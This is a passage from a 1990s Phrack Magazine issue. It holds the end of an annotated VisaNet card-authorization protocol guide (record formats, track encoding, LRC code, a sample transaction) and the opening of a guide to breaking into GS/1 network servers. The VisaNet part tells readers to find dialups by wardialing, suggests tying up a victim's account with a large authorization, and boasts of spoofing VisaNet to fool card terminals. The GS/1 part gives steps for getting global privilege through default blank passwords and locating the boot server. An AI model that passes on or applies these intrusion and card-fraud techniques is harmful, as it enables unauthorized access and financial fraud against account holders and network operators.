  12501.    SERV NOT ALLOWED    57        Trans. not permitted-Card              0
  12502.    SERV NOT ALLOWED    58        Trans. not permitted-Terminal          0
  12503.    SERVICE CODE ERR    62        Restricted Card                        0
  12504.      SYSTEM ERROR      96        System Malfunction [whoop whoop!]      0
  12505.      TERM ID ERROR     03        Invalid Merchant ID                    0
  12506.       WRONG PIN        55        Incorrect PIN                          0
  12507.   xxxxxxxxxxxxxxxxxx   xx        Undefined Response                     0
  12508. --------------------------------------------------------------------------------
  12509.  
  12510. 5.07 APPROVAL CODE
  12511.  
  12512. This field contains a six-character code when a transaction has been approved.
  12513. If the transaction is not approved the contents of the field should be ignored.
  12514. The approval code is input to the data capture detail transaction record.
  12515.  
  12516. 5.08 LOCAL TRANSACTION DATE
  12517.  
  12518. This field contains a six-digit local date calculated (MMDDYY) by the
  12519. authorization center using the time zone differential code provided in the
  12520. authorization request message.  This date is used by the terminal as the date to
  12521. be printed on the transaction receipts and audit reports, and as the date input
  12522. to the data capture transaction detail record.  This field is only valid for
  12523. approved transactions.
  12524.  
  12525. 5.09 AUTHORIZATION RESPONSE MESSAGE
  12526.  
  12527. This field is a sixteen-character field containing a response display message.
  12528. This message is used by the terminal to display the authorization results.
  12529. Table 5.06 provides the message summary.   The messages are provided with "sp"
  12530. space fill.  This field is mapped to the RESPONSE CODE, field 5.06, for all
  12531. non-AVS transactions and for all DECLINED AVS transactions.  For APPROVED AVS
  12532. transactions (response code = "00" or "85"), it is mapped to the AVS RESULT
  12533. CODE, field 5.10.
  12534.  
  12535. 5.10 AVS RESULT CODE
  12536.  
  12537. This one-character field contains the address verification result code.  An
  12538. address verification result code is provided for transactions and provides an
  12539. additional indication that the card is being used by the person to which the
  12540. card was issued.  The service is only available for mail/phone order
  12541. transactions.
  12542.  
  12543. Table 5.06 provides a summary of the AVS Result Codes.
  12544.  
  12545. An ANSI X3.4 "0" is provided for all non-AVS transactions and all declined
  12546. transactions.
  12547.  
  12548. 5.11 TRANSACTION IDENTIFIER
  12549.  
  12550. This numeric field will contain a transaction identifier.  The identifier will
  12551. be fifteen-digits in length if the payment service indicator value is an "A" or
  12552. it will be zero in length if the payment service indicator value is not an "A".
  12553. This value is stored in the batch detail record for terminals that capture and
  12554. is mandatory for REPS qualification.
  12555.  
  12556. 5.12 FIELD SEPARATOR
  12557.  
  12558. The authorization record format specifies the use of the "FS" character.
  12559.  
  12560. 5.13 VALIDATION CODE
  12561.  
  12562. This alphanumeric field will contain a validation code.  The code will contain a
  12563. four-character value if the payment service indicator value is an "A" or it will
  12564. be zero in length if the payment service indicator value is not an "A".  This
  12565. value is stored in the batch detail record for terminals that capture and is
  12566. mandatory for REPS qualification.
  12567.  
  12568. 5.14 FIELD SEPARATOR
  12569.  
  12570. The authorization record format specifies the use of the "FS" character.
  12571.  
  12572. 5.15 NETWORK IDENTIFICATION CODE
  12573.  
  12574. This one-character fixed length field contains the identification code of the
  12575. network on which the transaction was authorized.  The network ID must be printed
  12576. on the receipt.
  12577.  
  12578. 5.16 SETTLEMENT DATE
  12579.  
  12580. This four-digit fixed length field contains the transaction settlement date
  12581. returned by the authorizing system (MMDD).  The settlement date must be printed
  12582. on the receipt.
  12583.  
  12584. 5.17 SYSTEM TRACE AUDIT NUMBER
  12585.  
  12586. This six-character fixed length field contains a trace audit number which is
  12587. assigned by the authorizing system.  The trace audit number must be printed on
  12588. the receipt.
  12589.  
  12590. 5.18 RETRIEVAL REFERENCE NUMBER
  12591.  
  12592. This twelve-character fixed length field contains the transaction retrieval
  12593. reference number returned by the authorizing system.  The reference number
  12594. should be printed on the receipt.
  12595.  
  12596. 5.19 LOCAL TRANSACTION TIME
  12597.  
  12598. This six-digit fixed length field contains the transaction time returned by the
  12599. authorizing system (HHMMSS).  The time must be printed on the receipt.
  12600.  
  12601. 6.0 CONFIRMATION RECORD DATA ELEMENT DEFINITIONS
  12602.  
  12603. The following subsections define the debit confirmation response record data
  12604. elements.
  12605.  
  12606. 6.01 NETWORK IDENTIFICATION CODE
  12607.  
  12608. This one character fixed length field contains the identification code of the
  12609. network on which the transaction was authorized.  The network ID is printed on
  12610. the receipt.
  12611.  
  12612. 6.02 SETTLEMENT DATE
  12613.  
  12614. This four-digit fixed length field contains the transaction settlement date
  12615. returned by the authorizing system.
  12616.  
  12617. 6.03 SYSTEM TRACE AUDIT NUMBER
  12618.  
  12619. This six-character fixed length field contains the system trace audit number
  12620. which is assigned by the authorizing system.
  12621.  
  12622. 7.0 CHARACTER CODE DEFINITIONS
  12623.  
  12624. The following subsections will define the authorization request record character
  12625. set and character sets used for track 1 and track 2 data encoded on the magnetic
  12626. stripes.
  12627.  
  12628. The authorization request records are generated with characters defined by ANSI
  12629. X3.4-1986.  The data stored on the cardholder's card in magnetic or optical form
  12630. must be converted to the ANSI X3.4 character set before transmission to VisaNet.
  12631.  
  12632. Section 7.01 provides track 1 character set definition.  Section 7.02 provides
  12633. track 2 character set definition.  Section 7.03 provides the ANSI X3.4-1986 and
  12634. ISO 646 character set definitions.  Section 7.04 provides a cross reference
  12635. between the track 1, track 2, and ANSI X3.4 character sets.  Section 7.05
  12636. describes the method for generating and checking the Mod 10 Luhn check digit for
  12637. credit card account numbers.  Section 7.06 describes the method for generating
  12638. the LRC byte for the authorization request message and for testing the card
  12639. swipe's LRC byte.  Section 7.07 provides sample data for an authorization
  12640. request and response for record format "J" testing.
  12641.  
  12642. The POS device/authorization must perform the following operations on track
  12643. read data before it can be used in an authorization request message.
  12644.  
  12645.    1. The LRC must be calculated for the data read from the track and compared
  12646.       to the LRC read from the track.  The track data is assumed to be read
  12647.       without errors when on character parity errors are detected and the
  12648.       calculated and read LRC's match.
  12649.  
  12650.    2. The starting sentinel, ending sentinel, and LRC are discarded.
  12651.  
  12652.    3. The character codes read from the magnetic stripe must be converted from
  12653.       the encoded character set to the set used for the authorization request
  12654.       message.  The characters encoded on track 1 are six-bit plus parity codes
  12655.       and the characters encoded on track 2 are four-bit plus parity codes, with
  12656.       the character set used for the request message defined as seven-bit plus
  12657.       parity codes.
  12658.  
  12659. All characters read from a track must be converted to the request message
  12660. character set and transmitted as part of the request.  The converted track data
  12661. can not be modified by adding or deleting non-framing characters and must be a
  12662. one-for-one representation of the characters read from the track.  [sounds like
  12663. they mean it, eh?]
  12664.  
  12665. 7.1 TRACK 1 CHARACTER DEFINITION
  12666.  
  12667. Table 7.01 provides the ISO 7811-2 track 1 character encoding definitions.  This
  12668. "standards" format is a SAMPLE guideline for expected credit card track
  12669. encoding; ATM/debit cards may differ.  Actual cards may differ [not], whether
  12670. they are Visa cards or any other issuer's cards.
  12671.  
  12672. Each character is defined by the six-bit codes listed in Table 7.01.
  12673.  
  12674. Track 1 can be encoded with up to 79 characters as shown in Figure 7.01
  12675.  
  12676. +---------------------------------------------------------+
  12677. |SS|FC| PAN|FS|  NAME|FS| DATE| DISCRETIONARY DATA |ES|LRC|
  12678. +---------------------------------------------------------+
  12679.  
  12680. LEGEND:
  12681.  
  12682.              Field  Description                                  Length  Format
  12683. --------------------------------------------------------------------------------
  12684.                 SS  Start Sentinel                                 1        %
  12685.                 FC  Format Code ("B" for credit cards)             1       A/N
  12686.                PAN  Primary Account Number                      19 max     NUM
  12687.                 FS  Field Separator                                1        ^
  12688.               NAME  Card Holder Name (See NOTE below)           26 max     A/N
  12689.                 FS  Field Separator                                1        ^
  12690.               DATE  Expiration Date (YYMM)                         4       NUM
  12691. Discretionary Data  Option Issuer Data (See NOTE below)         variable   A/N
  12692.                 ES  End Sentinel                                   1        ?
  12693.                LRC  Longitudinal Redundancy Check                  1
  12694.                                                                   ---
  12695.                     Total CAN NOT exceed 79 bytes----->           79
  12696. --------------------------------------------------------------------------------
  12697.  
  12698.                                   FIGURE 7.01
  12699.                           Track 1 Encoding Definition
  12700.  
  12701. NOTE: The CARD HOLDER NAME field can include a "/" as the surname separator
  12702.       and a "." as the title separator
  12703.  
  12704.       The DISCRETIONARY DATA can contain any of the printable characters from
  12705.       Table 7.01
  12706.  
  12707.                                    TABLE 7.01
  12708.                           Track 1 Character Definition
  12709.  
  12710.                        b6   0   0   1   1
  12711. BIT NUMBER             b5   0   1   0   1      (a) These character positions
  12712. -------------------------------------------        are for hardware use only
  12713. b4 b3 b2 b1    ROW/COL      0   1   2   3
  12714. -------------------------------------------    (b) These characters are for
  12715. 0  0  0  0        0        SP   0  (a)  P          country use only, not for
  12716. 0  0  0  1        1        (a)  1   A   Q          international use
  12717. 0  0  1  0        2        (a)  2   B   R
  12718. 0  0  1  1        3        (c)  3   C   S      (c) These characters are
  12719. 0  1  0  0        4         $   4   D   T          reserved for added
  12720. 0  1  0  1        5        (%)  5   E   U          graphic use [nifty]
  12721. 0  1  1  0        6        (a)  6   F   V
  12722. 0  1  1  1        7        (a)  7   G   W
  12723. 1  0  0  0        8         (   8   H   X      (%) Start sentinel
  12724. 1  0  0  1        9         )   9   I   Y      (/) End sentinel
  12725. 1  0  1  0        A        (a) (a)  J   Z      (^) Field Separator
  12726. 1  0  1  1        B        (a) (a)  K  (b)      /  Surname separator
  12727. 1  1  0  0        C        (a) (a)  L  (b)      .  Title separator
  12728. 1  1  0  1        D         -  (a)  M  (b)      SP Space
  12729. 1  1  1  0        E         -  (a)  N  (^)      +-----------------------+
  12730. 1  1  1  1        F         /  (?)  O  (a)      |PAR|MSB|B5|B4|B3|B2|LSB|
  12731.                                                 +-+---+-----------------+
  12732.                                                   |   |--- Most Significant Bit
  12733.                                                   |--- Parity Bit (ODD)
  12734.                                                Read LSB First
  12735.  
  12736. 7.02 TRACK 2 CHARACTER DEFINITION
  12737.  
  12738. Table 7.02 provides the ISO 7811-2 track 2 character encoding definitions.  This
  12739. "standards" format is a SAMPLE guideline for expected credit card track
  12740. encoding; ATM/debit cards may differ.  Actual cards may differ, whether they are
  12741. Visa cards or any other issuer's cards.
  12742.  
  12743. Each character is defined by the four-bit codes listed in Table 7.02.
  12744.  
  12745. Track 2 can be encoded with up to 40 characters as shown in Figure 7.02.
  12746.  
  12747. +--------------------------------------------------------+
  12748. |SS|    PAN   |FS| DATE|    DISCRETIONARY DATA    |ES|LRC|
  12749. +--------------------------------------------------------+
  12750.  
  12751. LEGEND:
  12752.  
  12753.              Field  Description                                  Length  Format
  12754. --------------------------------------------------------------------------------
  12755.                 SS  Start Sentinel                                 1     0B hex
  12756.                PAN  Primary Account Number                      19 max     NUM
  12757.                 FS  Field Separator                                1        =
  12758. Discretionary Data  Option Issuer Data (See NOTE below)         variable   A/N
  12759.                 ES  End Sentinel                                   1     0F hex
  12760.                LRC  Longitudinal Redundancy Check                  1
  12761.                                                                   ---
  12762.                     Total CAN NOT exceed 40 bytes----->           40
  12763. --------------------------------------------------------------------------------
  12764.  
  12765.                                   FIGURE 7.02
  12766.                           Track 2 Encoding Definition
  12767.  
  12768. NOTE: The PAN and DATE are always numeric.  The DISCRETIONARY DATA can be
  12769.       numeric with optional field separators as specified in Table 7.02.
  12770.  
  12771.  
  12772.                                    TABLE 7.02
  12773.                              Track 2 Character Set
  12774.  
  12775. b4  b3  b2  b1     COL              (a) These characters are for
  12776. ------------------------------          hardware use only
  12777. 0   0   0   0       0      0
  12778. 0   0   0   1       1      1        (B) Starting Sentinel
  12779. 0   0   1   0       2      2
  12780. 0   0   1   1       3      3        (D) Field Separator
  12781. 0   1   0   0       4      4
  12782. 0   1   0   1       5      5        (F) Ending Sentinel
  12783. 0   1   1   0       6      6
  12784. 0   1   1   1       7      7
  12785. 1   0   0   0       8      8        +---------------------------+
  12786. 1   0   0   1       9      9        | PAR | MSB | b3 | b2 | LSB |
  12787. 1   0   1   0       A     (a)       +---------------------------+
  12788. 1   0   1   1       B     (B)          |     |
  12789. 1   1   0   0       C     (a)          |     |--- Most Significant Bit
  12790. 1   1   0   1       D     (D)          |--- Parity Bit (ODD)
  12791. 1   1   1   0       E     (a)
  12792. 1   1   1   1       F     (F)        Read LSB first
  12793.  
  12794. [ tables 7.03a, 7.03b, and 7.04 deleted...
  12795.   If you really need a fucking ascii table that bad go buy a book.]
  12796.  
  12797. [ section 7.05 - Account Data Luhn Check deleted...
  12798.   as being unnecessary obtuse and roundabout in explaining how the check works.
  12799.   the routine written by crazed luddite and murdering thug is much clearer. ]
  12800.  
  12801. 7.06 CALCULATING AN LRC
  12802.  
  12803. When creating or testing the LRC for the read of the card swipe, the
  12804. authorization request record, the debit confirmation record or the VisaNet
  12805. response record; use the following steps to calculate the LRC:
  12806.  
  12807. 1) The value of each bit in the LRC character, excluding the parity bit, is
  12808.    defined such that the total count of ONE bits encoded in the corresponding
  12809.    bit location of all characters of the data shall be even (this is also known
  12810.    as an EXCLUSIVE OR (XOR) operation)
  12811.  
  12812.       For card swipes, include the start sentinel, all the data read and
  12813.       the end sentinel.
  12814.  
  12815.       For VisaNet protocol messages, begin with the first character past
  12816.       the STX, up to and including the ETX.
  12817.  
  12818. 2) The LRC characters parity bit is not a parity bit for the individual parity
  12819.    bits of the data message, but it only the parity bit for the LRC character
  12820.    itself.  Calculated as an even parity bit.
  12821.  
  12822. [ i list a routine for calculating an LRC o a string later on in the document ]
  12823.  
  12824. 7.07 TEST DATA FOR RECORD FORMAT "J"
  12825.  
  12826. The following two sections provide sample data for testing record format "J"
  12827. with the VisaNet dial system.
  12828.  
  12829. 7.07.01 TEST DATA FOR A FORMAT "J" AUTHORIZATION REQUEST
  12830.  
  12831. Table 7.07a provides a set of test data for record format "J" authorization
  12832. request.
  12833.  
  12834.                                   TABLE 7.07a
  12835.                         Test Data For Record Format "J"
  12836.  
  12837.  Test Data      Byte #   Length   Format   Field Name
  12838. --------------------------------------------------------------------------------
  12839.      J            1         1       A/N    Record Format
  12840.  0, 2, or 4       2         1       A/N    Application Type
  12841.      .            3         1       A/N    Message Delimiter
  12842.    401205        4-9        6       A/N    Acquirer BIN
  12843. 123456789012    10-21       12      NUM    Merchant Number
  12844.     0001     *  22-25       4       NUM    Store Number
  12845.     0001     *  26-29       4       NUM    Terminal Number
  12846.     5999        30-33       4       NUM    Merchant Category Code
  12847.     840         34-36       3       NUM    Merchant Country Code
  12848.    94546        37-41       5       A/N    Merchant City Code
  12849.     108         42-44       3       NUM    Time Zone Differential
  12850.     54          45-46       2       A/N    Authorization Transaction Code
  12851.   12345678      47-54       8       NUM    Terminal Identification Number
  12852.      Y           55         1       A/N    Payment Service Indicator
  12853.     0001     *  56-59       4       NUM    Transaction Sequence Number
  12854.      @           60         1       A/N    Cardholder Identification Code
  12855. D, H, T, or X    61         1       A/N    Account Data Source
  12856.  Track or                                  Customer Data Field
  12857. Manual Data
  12858.     "FS"        N.A.        1       "FS"   Field Separator
  12859.   0000123       N.A.      0 to 43   A/N    Transaction Amount
  12860.     "FS"        N.A.        1       "FS"   Field Separator
  12861.      ER         N.A.      0 or 2    A/N    Device Code/Industry code
  12862.     "FS"        N.A.        1       "FS"   Field Separator
  12863.                 N.A.      0 or 6    NUM    Issuing/Receiving Institution ID
  12864.     "FS"        N.A.        1       "FS"   Field Separator
  12865.     000         N.A.      3 to 12   NUM    Secondary Amount (Cashback)
  12866.     "FS"        N.A.        1       "FS"   Field Separator
  12867. --------------------------------------------------------------------------------
  12868.  
  12869. NOTE:* Denotes fields that are returned in the response message
  12870.  
  12871. 7.07.2 RESPONSE MESSAGE FOR TEST DATA
  12872.  
  12873. Table 7.07b provides the response message for the test data provided in section
  12874. 7.07.1.
  12875.  
  12876.                                   TABLE 7.07b
  12877.                Response Message For Test Data - Record Format "J"
  12878.  
  12879.  Test Data      Byte #   Length   Format   Field Name
  12880. --------------------------------------------------------------------------------
  12881. A, Y, N, or   *   1        1       A/N     Payment Service Indicator
  12882.  "space"
  12883.    0001       *  2-5       4       NUM     Store Number
  12884.    0001       *  6-9       4       NUM     Terminal Number
  12885.     5         *   1        1       A/N     Authorization Source Code
  12886.    0001       * 11-14      4       NUM     Transaction Sequence Number
  12887.     00        * 15-16      2       A/N     Response Code
  12888.   12AB45      * 17-22      6       A/N     Approval Code
  12889.   111992      * 23-28      6       NUM     Transaction Date (MMDDYY)
  12890. AP ______       29-44      16      A/N     Authorization Response Message
  12891. 0, Sp, or "FS"   45        1       A/N     AVS Result Code
  12892.               *Variable  0 or 15   NUM     Transaction Identifier
  12893.     "FS"                           "FS"    Field Separator
  12894.               *Variable  0 or 4    A/N     Validation Code
  12895.     "FS"                           "FS"    Field Separator
  12896. --------------------------------------------------------------------------------
  12897. NOTE: * Move to data capture record for VisaNet Central Data Capture (CDC)
  12898. --------------------------------------------------------------------------------
  12899.  
  12900.                                 [ section two ]
  12901.                               [ finding visanet ]
  12902.  
  12903. finding visanet isn't hard, but it can be tedious.  visanet rents time off of
  12904. compuserve and X.25 networks.  the compuserve nodes used are not the same
  12905. as their information service, cis.  to identify a visanet dialup after
  12906. connecting, watch for three enq characters and a three second span to hangup.
  12907. if you've scanned out a moderate portion of your area code, you probably have a
  12908. few dialups.  one idea is to write a short program to dial all the connects you
  12909. have marked as garbage or worthless [ you did keep em, right? ]  and wait
  12910. for the proper sequence.  X.25 connections should work similarly, but i don't
  12911. know for sure.  read the section on visanet usage for other dialup sources.
  12912.  
  12913.                                 [ section three ]
  12914.                         [ visanet link level protocol ]
  12915.  
  12916. messages to/from visanet have a standard format:
  12917.  
  12918.     stx - message - etx - lrc
  12919.  
  12920. the message portion is the record formats covered in section one.  lrc values
  12921. are calculated starting with the first byte of message, going up to and
  12922. including the etx character.  heres an algorithm that calculates the lrc for a
  12923. string. note: in order to work with the visanet protocols, append etx to the
  12924. string before calling this function.
  12925.  
  12926. unsigned char func_makelrc(char *buff)
  12927. {
  12928.    int i;
  12929.    char ch, *p;
  12930.  
  12931.    ch = 0;
  12932.    p = buff;
  12933.  
  12934.    for(;;)  {
  12935.       ch = (ch^(*p));
  12936.       p++;
  12937.       if(!(*p))
  12938.          break;
  12939.    }
  12940.  
  12941.    return ch;
  12942. }
  12943.  
  12944. for a single authorization exchange, the easiest kind of transaction, the
  12945. sequence goes like this:
  12946.  
  12947. host   enq                   stx-response-etx-lrc   eot
  12948. term      stx-request-etx-lrc                    ack
  12949.                                                           <disconnect>
  12950.  
  12951. matching this sequence with test record formats from section one, 7.07, heres
  12952. an ascii representation of a transaction.  control characters denoted in <>'s.
  12953. [of course, you wouldn't really have a carriage return in middle of a message.
  12954. duh. ]  this transaction would be for card number 4444111122223333 with an
  12955. expiration date of 04/96.  the purchase amount is $1.23.  visanet responds with
  12956. an approval code of 12ab45.
  12957.  
  12958. host: <enq>
  12959.  
  12960. term: <stx>J0.401205123456789012000100015999840945461085412345678Y0001@H444411
  12961.       1122223333<fs>0496<fs>0000123<fs>ER<fs><fs>000<fs><etx><lrc>
  12962.  
  12963. host: <stx>Y00010001500010012AB45111992APPROVAL 12AB45123456789012345<fs>
  12964.       ABCD<fs><etx><lrc>
  12965.  
  12966. term: <ack>
  12967.  
  12968. host: <eot>
  12969.  
  12970. authorizing multiple transactions during one connect session is only slightly
  12971. more complicated.  the etx character on all messages sent to visanet are changed
  12972. to etb and the application type is changed from '0' to '2' [section one 4.02].
  12973. instead of responding after a transaction with eot, visanet instead polls the
  12974. terminal again with enq.  this continues until the terminal either changes back
  12975. to the single transaction format or issues an eot to the host.
  12976.  
  12977. heres a short list of all control characters used:
  12978.  
  12979. stx: start-of-text, first message framing character signaling message start
  12980. etx: end-of-text, the frame ending character the last message of a sequence
  12981. eot: end-of-transmission, used to end an exchange and signal disconnect
  12982. enq: enquiry, an invitation to transmit a message or retransmit last item
  12983. ack: affirmative acknowledgment, follows correct reception of message
  12984. nak: negative acknowledgment, used to indicate that the message was not
  12985.      understood or was received with errors
  12986. syn: delay character, wait thirty seconds
  12987. etb: end-of-block, the end framing character used to signal the end of a message
  12988.      within a multiple message sequence
  12989.  
  12990. other quick notes: visanet sometimes sends ack before stx on responses
  12991.                    lrc characters can hold any value, such as stx, nak, etc
  12992.                    visanet can say goodbye at any time by sending eot
  12993.                    people can get very anal about error flow diagrams
  12994.  
  12995.                                 [ section four ]
  12996.                     [ half the story; central data capture ]
  12997.  
  12998. a full transaction requires two steps, one of which is described in this
  12999. document: getting the initial authorization.  an authorization does basically
  13000. nothing to a person's account.  oh, you could shut somebody's account down for
  13001. a day or two by requesting a twenty thousand dollar authorization, but no other
  13002. ill effects would result.  central data capture, the second and final step in a
  13003. transaction, needs information from both the authorization request and
  13004. response, which is used to generate additional data records.  these records are
  13005. then sent to visanet by the merchant in a group, usually at the end of each day.
  13006.  
  13007.                                 [ section five ]
  13008.                             [ common applications ]
  13009.  
  13010. access to visanet can be implemented in a number of ways: directly on a pos
  13011. terminal, indirectly via a lan, in a hardware specific device, or any
  13012. permutation possible to perform the necessary procedures.  card swipers commonly
  13013. seen at malls are low tech, leased at around fifty dollars per month, per
  13014. terminal.  they have limited capacity, but are useful in that all of the
  13015. information necessary for transactions is self contained.  dr delam and maldoror
  13016. found this out, and were delighted to play the role of visanet in fooling the
  13017. little device.  close scrutiny of section one reveals atm formats, phone order
  13018. procedures, and new services such as direct debit from checking/savings and
  13019. checks by phone.  start noticing the stickers for telecheck and visa atm cards,
  13020. and you're starting to get the picture.
  13021.  
  13022.                                [ section seven ]
  13023.                               [ brave new world ]
  13024.  
  13025. could it be?  yes, expiration dates really don't matter....
  13026. this article written to thank previous Phrack writers...
  13027. please thank me appropriately...
  13028. 800#s exist...
  13029. other services exist... mastercard runs one...
  13030. never underestimate the power of asking nicely...
  13031. numerous other formats are available... see section one, 3.0 for hints...
  13032. never whistle while you're pissing...                              ==Phrack Magazine==
  13033.  
  13034.                  Volume Five, Issue Forty-Six, File 17 of 28
  13035.  
  13036. ****************************************************************************
  13037.  
  13038. [<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
  13039. [<>                                                                     <>]
  13040. [<>   ----+++===:::  GETTiN' D0wN 'N D1RTy wiT Da GS/1  :::===+++----   <>]
  13041. [<>                                                                     <>]
  13042. [<> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <>]
  13043. [<>                                                                     <>]
  13044. [<>                        Brought to you by:                           <>]
  13045. [<>        [)elam0 Labz, Inc. and ChURcH oF ThE Non-CoNForMisT          <>]
  13046. [<>                                                                     <>]
  13047. [<>        Story line: Maldoror -n- [)r. [)elam                         <>]
  13048. [<>        Main Characters: Menacing Maldoror & The Evil [)r. [)elam    <>]
  13049. [<>        Unix Technical Expertise: Wunder-Boy [)elam                  <>]
  13050. [<>        Sysco Technishun: Marvelous Maldoror                         <>]
  13051. [<>                                                                     <>]
  13052. [<>        Look for other fine [)elamo Labz and ChURcH oF ThE           <>]
  13053. [<>        Non-CoNForMisT products already on the market such as        <>]
  13054. [<>        DEPL (Delam's Elite Password Leecher), NUIA (Maldoror's      <>]
  13055. [<>        Tymnet NUI Attacker), TNET.SLT (Delam's cheap0 Telenet       <>]
  13056. [<>        skanner for Telix), PREFIX (Maldoror's telephone prefix      <>]
  13057. [<>        identification program), and various other programs and      <>]
  13058. [<>        philez written by Dr. Delam, Maldoror, Green Paradox,        <>]
  13059. [<>        El Penga, Hellpop, and other certified DLI and CNC members.  <>]
  13060. [<>                                                                     <>]
  13061. [>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
  13062.  
  13063.                                Index
  13064.               ========================================
  13065.  
  13066.               1. Finding and identifying a GS/1
  13067.               2. Getting help
  13068.               3. Gaining top privilege access
  13069.               4. Finding the boot server
  13070.               5. Connecting to the boot server
  13071.               6. Getting the boot server password file
  13072.               7. Other avenues
  13073.  
  13074.  
  13075. ----------------------------------------------------------------------------
  13076.  
  13077.  
  13078. Here's hacking a GS/1 made EZ (for the sophisticated hacker)  It is
  13079. advisable to fill your stein with Sysco and pay close attention... if
  13080. Sysco is not available in your area, Hacker Pschorr beer will work
  13081. almost as good... (especially Oktoberfest variety)
  13082.  
  13083.  
  13084. What is a GS/1?
  13085. ---------------
  13086. A GS/1 allows a user to connect to various other computers... in other
  13087. words, it's a server, like a DEC or Xyplex.
  13088.  
  13089.  
  13090. So why hack it?
  13091. ---------------
  13092. Cuz itz there... and plus you kan access all sortz of net stuph fer
  13093. phree. (QSD @ 208057040540 is lame and if you connect to it, you're
  13094. wasting the GS/1.. the French fone police will fly over to your country
  13095. and hunt you down like a wild pack of dogs, then hang you by your own
  13096. twisted pair.)
  13097.  
  13098.  
  13099. What to do:
  13100. -----------
  13101.  
  13102.  
  13103.  
  13104.                +--------------------------------------+
  13105.                +  #1. Finding and identifying a GS/1  +
  13106.                +--------------------------------------+
  13107.  
  13108. Find a GS/1 .. they're EZ to identify.. they usually have a prompt of
  13109. GS/1, though the prompt can be set to whatever you want it to be.  A
  13110. few years ago there were quite a number of GS/1's laying around on
  13111. Tymnet and Telenet... you can still find a few if you scan the right
  13112. DNIC's.  (If you don't know what the hell I'm talking about, look at
  13113. some old Phracks and LOD tech. journals.)
  13114.  
  13115. The prompt will look similar to this:
  13116.  
  13117. (!2) GS/1>
  13118.  
  13119. (The (!2) refers to the port you are on)
  13120.  
  13121.  
  13122.  
  13123.                         +--------------------+
  13124.                         +  #2. Getting help  +
  13125.                         +--------------------+
  13126.  
  13127. First try typing a '?' to display help items.
  13128.  
  13129. A help listing looks like this:
  13130.  
  13131. > (!2) GS/1>?
  13132. >       Connect     <address>[,<address>] [ ECM ] [ Q ]
  13133. >       DO          <macro-name>
  13134. >       Echo        <string>
  13135. >       Listen
  13136. >       Pause       [<seconds>]
  13137. >       PIng        <address> [ timeout ]
  13138. >       SET         <param-name> = <value> ...
  13139. >       SHow        <argument> ...
  13140.  
  13141. At higher privileges such as global (mentioned next) the help will
  13142. look like this (note the difference in the GS/1 prompt with a # sign):
  13143.  
  13144. > (!2) GS/1# ?
  13145. >       BRoadcast   ( <address> ) <string>
  13146. >       Connect     ( <address> ) <address>[,<address>] [ ECM ] [ Q ]
  13147. >       DEFine      <macro-name> = ( <text> )
  13148. >       DisConnect  ( <address> ) [<session number>]
  13149. >       DO          ( <address> ) <macro-name>
  13150. >       Echo        <string>
  13151. >       Listen      ( <address> )
  13152. >       Pause       [<seconds>]
  13153. >       PIng        <address> [ timeout ]
  13154. >       ReaD        ( <address> ) <option> <parameter>
  13155. >       REMOTE      <address>
  13156. >       ROtary      ( <address> ) !<rotary> [+|-]= !<portid>[-!<portid>] , ...
  13157. >       SAve        ( <address> ) <option> <filename>
  13158. >       SET         ( <address> ) <param-name> = <value> ...
  13159. >       SETDefault  ( <address> ) [<param-name> = <value>] ...
  13160. >       SHow        ( <address> ) <argument> ...
  13161. >       UNDefine    ( <address> ) <macro-name>
  13162. >       UNSave      ( <address> ) <filename>
  13163. >       ZeroMacros  ( <address> )
  13164. >       ZeroStats   ( <address> )
  13165.  
  13166. Additional commands under global privilege are: BRoadcast, DEFine,
  13167. DisConnect, ReaD, REMOTE, ROtary, UNDefine, UNSave, ZeroMacros,
  13168. ZeroStats, and a few extra options under the normal user commands.
  13169.  
  13170. If you need in-depth help for any of the commands, you can again use the
  13171. '?' in the following fashion:
  13172.  
  13173. > (!2) GS/1>sho ?
  13174. >       SHow    ADDRess
  13175. >       SHow    ClearingHouseNames [ <name> [ @ <domain> [@ <organ.> ] ] ]
  13176. >       SHow    DefaultParameters [<param-name> ...]
  13177. >       SHow    GLobalPARameters
  13178. >       SHow    NetMAP [ Short | Long ]
  13179. >       SHow    PARAmeterS [<param-name> ...]
  13180. >       SHow    <param-name> ...
  13181. >       SHow    SESsions [ P ]
  13182. >       SHow    VERSion
  13183.  
  13184. > (!2) GS/1>sh add?
  13185. >       SHow    ADDRess
  13186.  
  13187. > (!2) GS/1>sh add
  13188. > ADDRess = &000023B5%07000201E1D7!2
  13189.  
  13190. "sh add" displays your own network, address and port number.
  13191.  
  13192. The network is 000023B5
  13193. The address is 07000201E1D7
  13194. The port number is 2
  13195.  
  13196.  
  13197.  
  13198.                    +------------------------------------+
  13199.                    +  #3. Gaining top privilege access  +
  13200.                    +------------------------------------+
  13201.  
  13202. Figure out the global password.
  13203.  
  13204. Do a "set priv=global" command.
  13205.  
  13206.    Note:
  13207.    ----
  13208.    There are 3 states to set priv to: user, local, and global.  Global is
  13209.    the state with the most privilege.  When you attain global privilege,
  13210.    your prompt will change to have a '#' sign at the end of it.. this means
  13211.    you have top priceless (similar to *nix's super user prompt).
  13212.  
  13213. The GS/1 will prompt you for a password.  The default password on GS/1's
  13214. is to have no password at all... The GS/1  will still prompt you for a
  13215. password, but you can enter anything at this point if the password was
  13216. never set.
  13217.  
  13218.  
  13219.  
  13220.                   +-------------------------------+
  13221.                   +  #4. Finding the boot server  +
  13222.                   +-------------------------------+
  13223.  
  13224. Figure out the boot server address available from this GS/1 ..
  13225.  
  13226. The boot server is what lies under the GS/1.  We've found that GS/1's are
  13227. actually run on a Xenix operating system.. (which is of course a nice
  13228. phamiliar territory)  It's debatable whether all GS/1's are run on Xenix or
  13229. not as we have yet to contact the company.  (We may put out a 2nd file going
  13230. into more detail.)
  13231.  
  13232. Do a "sh b" or "sh global" as shown in the following examples:
  13233.  
  13234. > (!2) GS/1# sh b
  13235. > BAud = 9600         BootServerAddress = &00000000%070002017781
  13236. > BReakAction = ( FlushVC, InBand )       BReakChar = Disabled
  13237. > BSDelay = None      BUffersize = 82
  13238.  
  13239. > (!2) GS/1# sh global
  13240. > ...............................Global Parameters............................
  13241. > DATE = Wed Jun 22 21:16:45 1994         TimeZone = 480 minutes
  13242. > DaylightSavingsTime = 0 minutes         LogoffStr = "L8r laM3r"
